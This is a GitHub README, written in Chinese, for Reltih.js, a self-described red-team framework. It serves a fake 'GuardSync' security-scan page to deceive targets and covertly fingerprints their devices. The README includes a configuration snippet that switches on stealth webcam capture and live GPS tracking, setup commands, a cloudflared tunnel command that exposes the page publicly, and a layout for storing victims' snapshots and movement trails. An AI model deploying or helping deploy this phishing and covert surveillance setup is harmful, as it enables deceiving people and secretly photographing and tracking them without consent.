iNarrow12/Reltih.js

GitHub: iNarrow12/Reltih.js

一个面向红队的隐蔽浏览器指纹识别与侦察框架,通过伪造零信任界面收集深度设备情报。

Stars: 1 | Forks: 0

![header](https://capsule-render.vercel.app/api?type=waving&height=300&text=Reltih.js&textBg=false&fontColor=ffff&fontAlignY=42) ![Python](https://img.shields.io/badge/Python-3.8+-3776AB?style=for-the-badge&logo=python&logoColor=white) ![Flask](https://img.shields.io/badge/Flask-Waitress-000000?style=for-the-badge&logo=flask&logoColor=white) ![JavaScript](https://img.shields.io/badge/JavaScript-Payloads-F7DF1E?style=for-the-badge&logo=javascript&logoColor=black) ![Status](https://img.shields.io/badge/Status-Active-34A853?style=for-the-badge)
## $ 概述 Reltih.js 是一个为 **Red Team 操作** 设计的高度隐蔽指纹识别与侦察框架。它部署了一个具有说服力的“零信任安全”外观(GuardSync)来欺骗目标,同时在隐蔽中提取深入的浏览器遥测数据、硬件规格、实时地理位置信息以及网络摄像头捕获内容,然后再获取内部访问权限。 ## $ 截图 ### $ GuardSync Phishing Facade ![Client Phishing Page / GuardSync](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/ef90ef5c08033401.png) ### $ 命令仪表板 ![Dashboard Page](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/49a8d6c006033405.png) ## $ 树状概览 ``` . ├── server.py # Main Flask backend API ├── engine.py # Risk Scoring and Bot Classification Engine ├── index.html # Decoy GuardSync phishing landing page ├── dashboard.html # Real-time monitoring dashboard ├── fp/ # Fingerprinting payload modules │ ├── behavioral.js # User interaction & bot heuristics │ ├── browser.js # Browser brand, version & features │ ├── codecs.js # Media capabilities & webRTC profiling │ ├── core.js # Aggregation & webhook orchestrator │ ├── environment.js # Hardware context flagger │ ├── extensions.js # Installed extension detector │ ├── gpu_ram.js # Graphics renderer & memory profiler │ ├── hardware.js # Processor, battery & pointer enumeration │ ├── murmur.js # WebGL, Canvas, Audio & Font hashing │ ├── network.js # Local/Public IPs & GeoIP fetching │ ├── os.js # OS, kernel & driver enumeration │ ├── permissions.js # API access rights tracking │ ├── storage.js # Local session footprinting │ ├── surveillance.js # Webcam and live GPS capture │ └── timing.js # Execution speed forensics └── Database/ # Auto-generated device intel storage ``` ## $ 功能 | 模块 | 描述 | |------|-------| | **Phishing Facade** | 令人信服的“GuardSync”零信任登录模拟 | | **Deep Fingerprinting** | 通过 `murmur.js` 进行 WebGL、Canvas、音频和字体哈希的深度指纹识别 | | **VM/Sandbox Detection** | 评估 CPU 核心数、内存、GPU 渲染器以及交互异常以检测虚拟机/沙箱 | | **Location Tracking** | 使用 GPS 和 IP 追踪实现实时精度地图的地理位置跟踪 | | **Covert Camera** | 摄像头图像捕获并以 base64 格式远程提取 | | **Risk Scoring Engine** | 基于硬件上下文评估信任度,返回低/高风险标识 | | **Live Dashboard** | 带有会话查看器的设备监控仪表板 | ## $ 有效载荷模块 (fp/) `fp/` 目录包含被注入到目标浏览器中的模块化 JavaScript 载荷。它们在静默运行以提取深层指标,随后将数据回传至 Flask API。 | 模块文件 | 功能 | |----------|------| | `behavioral.js` | 评估鼠标移动、输入速度和交互启发式,以检测无头机器人 | | `browser.js` | 指纹识别真实的浏览器品牌、完整版本上下文、插件和功能标志 | | `codecs.js` | 探测支持的媒体编解码器、WebRTC 泄漏点以及 DRM 能力 | | `core.js` | 中央协调器,聚合所有数据载荷并通过隧道发送至后端 API | | `environment.js`| 分析高级硬件约束(电池、触摸、指针)以标记虚拟机 | | `extensions.js`| 扫描内部浏览器对象模型以检测常用安装的安全扩展 | | `gpu_ram.js` | 分析图形渲染引擎、视频内存和设备 RAM 大小限制 | | `hardware.js`| 枚举 CPU 架构、物理核心数量以及连接到机器的外设类型 | | `murmur.js` | 通过 WebGL、Canvas、音频振荡器和系统字体计算稳健的设备指纹 | | `network.js` | 提取 WebRTC 本地 IP、内部网络拓扑并集成外部 GeoIP API | | `os.js` | 详细展示操作系统版本、平台构建以及底层内核架构 | | `permissions.js`| 检查用户已授权的硬件访问 API(摄像头、麦克风、位置) | | `storage.js` | 测量本地存储配额、IndexedDB 能力以及会话足迹大小 | | `surveillance.js`| 核心模块,执行隐蔽的物理情报收集(网络摄像头快照与实时 GPS 追踪) | | `timing.js` | 收集取证性能执行时间以检测缓慢的沙箱环境 | ## $ 配置与有效载荷切换 你可以通过修改 `index.html` 中的切换开关来手动配置漏洞利用的强度。请定位到 `Surveillance.init()` 执行块以调整设置: ``` try { const result = await Surveillance.init(deviceId, { enableLocation: true, // Set to TRUE to trigger accurate GPS polling enableCamera: true, // Set to TRUE to initiate stealth Webcam capture camShots: 13 // Configure the number of consecutive photos to extract }); console.log('Surveillance started:', result); } catch (e) { console.warn('Surveillance failed or blocked:', e); } ``` * **`enableLocation`**:使用 `navigator.geolocation` 轮询高精度 GPS 数据。如果未授予权限,则使用基于 IP 的追踪作为后备。 * **`enableCamera`**:在隐藏的 video 元素中静默激活目标的网络摄像头并拍摄帧。 * **`camShots`**:定义应生成并上传到 `Database/` 目录的监控快照数量。 ## $ 安装 ``` git clone https://github.com/iNarrow12/Reltih.js.git cd Reltih.js pip install flask waitress requests ``` ## $ 使用 ``` # 启动后端服务器 (Waitress WSGI 在 5000 端口) python server.py ``` | URL | 描述 | |-----|-------| | `http://localhost:5000/` | 面向目标的 GuardSync 外观 | | `http://localhost:5000/dashboard` | 内部监控仪表板 | ## $ 公开暴露 ``` cloudflared tunnel --url http://localhost:5000 ``` ## $ 攻击流程 ``` Target visits deceptive URL | v Interacts with "GuardSync" Security Scan | v Fingerprinting modules (fp/*) execute silently <- IPs, Hardware, Hashes sent to server | v Risk engine evaluates trust (VM / Bot / Sandbox) | v Covert GPS and Camera payloads triggered <- Location and Photos captured | v Red Teamer views deep intelligence on Dashboard ``` ## $ 管理仪表板 | 功能 | 描述 | |------|-------| | Live Devices | 查看所有已捕获的目标及其最后在线状态 | | Trust Analysis | 由引擎计算的自动 `LOW RISK` / `HIGH RISK` 评分 | | Identity Overview | 精确的 OS、浏览器、GPU、内存及地理 IP 配置文件 | | Session Traces | 网络交互的详细 JSON 格式历史记录 | | Camera Viewer | 访问远程捕获的目标网络摄像头截图 | ## $ 数据库结构与客户端 ID Reltih.js 会根据浏览器指纹计算出的 16 字符硬件 `stableHash` 动态为每个目标分配一个持久的 **Client ID**。即使目标更改其 IP 地址或数天后返回,其 ID 仍保持不变。 所有情报数据按照这些 Client ID 组织在 `Database/` 目录中: ``` Database/ └── [Client_ID_Hex_Hash]/ # e.g. 4d95af47e2f25a90 │ ├── meta.json # Aggregated summary (Trust scores, IPs, hardware profile, flags) │ ├── sessions/ │ └── [timestamp].json # Raw, deep telemetry blocks for every single interaction │ ├── locations/ │ ├── log.json # Raw GPS coordinate payloads │ └── trail.json # Movement history tracked over time │ └── camshots/ ├── 20260413_233156_shot1.png # Surreptitiously captured webcam snapshots └── 20260413_233202_shot2.png ``` ## $ 许可证 MIT — 仅限安全研究、红队操作及教育用途。
![footer](https://capsule-render.vercel.app/api?type=waving&color=gradient&customColorList=12,20,24&height=100§ion=footer)
标签:APT, CMS安全, ESC6, Flask, GuardSync, IP 地址批量处理, JavaScript, Phishing, Python, Web侦察, Web指纹, 侦察框架, 前端指纹, 地理位置, 实时处理, 摄像头捕获, 数据可视化, 无后门, 浏览器指纹识别, 硬件指纹, 红队操作, 自定义脚本, 逆向工具, 隐蔽攻击, 零信任欺骗